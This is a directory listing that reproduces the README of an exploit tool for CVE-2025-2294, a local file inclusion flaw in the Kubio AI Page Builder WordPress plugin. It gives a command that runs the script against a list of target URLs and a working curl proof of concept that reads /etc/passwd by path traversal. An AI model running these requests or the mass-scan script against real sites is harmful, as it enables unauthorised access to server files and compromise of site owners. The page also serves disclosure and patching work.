Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-2294 | Kitploit
Tools/GitHubGitHub/0xwhoami35/cve-2025-2294
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHub0xwhoami35/cve-2025-2294

CVE-2025-2294

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-2294

🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱

🔍 Overview

CVE-2025-2294 is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows unauthenticated remote attackers 👾 to include arbitrary files on the server via the __kubio-site-edit-iframe-classic-template URL parameter.

Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.

👤 Author

Muhammad Nizar — Security Researcher 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️


Feel free to reach out for questions or collaboration! 🤝


📋 Affected Versions

  • Kubio AI Page Builder plugin ≤ 2.5.1 🛠️

🧰 Usage

Run the exploit script with a list of target URLs:

root@kitploit:~
python3 lfi.py -l list.txt

⚠️ Vulnerability Details

  • Type: Local File Inclusion (LFI) 🕳️
  • Severity: Critical (CVSS 9.8) 🔥
  • Attack Vector: Remote, unauthenticated 🌐
  • Impact: Confidentiality, Integrity, Availability 🔐

🧪 Proof of Concept (PoC)

root@kitploit:~
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
Download Tool